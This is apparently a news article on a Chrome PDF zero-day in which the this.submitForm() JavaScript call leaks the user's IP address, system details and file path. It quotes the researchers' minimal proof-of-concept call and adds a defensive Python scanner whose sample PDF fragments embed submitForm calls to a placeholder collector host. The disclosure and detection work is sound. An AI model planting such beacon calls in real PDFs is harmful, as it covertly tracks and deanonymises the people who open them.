Hackers using zero-day vulnerability on Chrome for tracking users

On February 26th, edgespot.io publicly disclosed a zero-day vulnerability in Chrome: opening a PDF file in the browser can leak the user’s information. Successful exploitation could cause the target user’s IP address and other information to be leaked. “EdgeSpot has detected multiple PDF samples in the wild which exploit a Google Chrome zero-day flaw.” The vulnerability is fairly serious and has a wide impact.

“The root is the “this.submitForm()” PDF Javascript API. We tested it with a minimal PoC, a simple API call like “this.submitForm(‘http://google.com/test’)” will make Google Chrome send the personal information to google.com.”

Information that may be leaked includes:

  • The public IP address of the user.
  • The operating system, Chrome version, etc. (in the HTTP POST header).
  • The full path to the PDF file on the user’s computer (in the HTTP POST payload).

Although information disclosure vulnerabilities do not directly lead to code execution, the risk is still not small. Until Chrome fixes the problem (Chrome claims it will be fixed at the end of April), users are advised to view received PDF documents locally in another PDF reader, or to disconnect from the network when opening a PDF document in Chrome.
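For triaging received PDFs before they are opened, the following added example (not code from EdgeSpot or the Chrome project) scans a file's bytes for the this.submitForm() call quoted above and reports the destination URL, including inside Flate-compressed streams. The sample object fragments and the example.invalid host are constructed for illustration, and the name check is a heuristic.

```python
import re
import zlib

# The PDF JavaScript call named in the report; group 1 is its URL argument.
# \\? tolerates a backslash-escaped parenthesis inside a PDF literal string.
SUBMIT_RE = re.compile(rb"submitForm\s*\\?\(\s*(?:\{[^}]*?cURL\s*:\s*)?['\"]([^'\"]+)['\"]")
STREAM_RE = re.compile(rb"stream\r?\n(.*?)\r?\nendstream", re.S)
HEX_NAME_RE = re.compile(rb"#([0-9A-Fa-f]{2})")

def candidate_buffers(pdf: bytes):
    """Yield the raw file, then every stream body that inflates with zlib."""
    yield pdf
    for m in STREAM_RE.finditer(pdf):
        try:
            # decompressobj tolerates trailing bytes after the deflate data
            yield zlib.decompressobj().decompress(m.group(1))
        except zlib.error:
            continue  # not FlateDecode; its raw bytes were already scanned

def find_submitform_urls(pdf: bytes) -> list[str]:
    """Return each distinct URL passed to submitForm(), in order of appearance."""
    urls = []
    for buf in candidate_buffers(pdf):
        for m in SUBMIT_RE.finditer(buf):
            url = m.group(1).decode("latin-1")
            if url not in urls:
                urls.append(url)
    return urls

def has_javascript_action(pdf: bytes) -> bool:
    """Heuristic: /JS or /JavaScript name present, after undoing #xx name escapes."""
    names = HEX_NAME_RE.sub(lambda m: bytes([int(m.group(1), 16)]), pdf)
    return b"/JavaScript" in names or b"/JS" in names

# Constructed object fragments (not complete PDFs); the host is a placeholder.
SAMPLE_PLAIN = (b"1 0 obj\n<< /S /J#61vaScript "
                b"/JS (this.submitForm('http://collector.example.invalid/t')) >>\nendobj\n")
SAMPLE_FLATE = (b"2 0 obj\n<< /Filter /FlateDecode >>\nstream\n"
                + zlib.compress(b"this.submitForm('http://collector.example.invalid/s');")
                + b"\nendstream\nendobj\n")

if __name__ == "__main__":
    for name, blob in (("plain", SAMPLE_PLAIN), ("flate", SAMPLE_FLATE)):
        print(name, has_javascript_action(blob), find_submitform_urls(blob))
```

A hit means the document will try to post to the listed URL when its script runs; a clean result does not prove the file is safe, since scripts can be hidden with other stream filters or encryption.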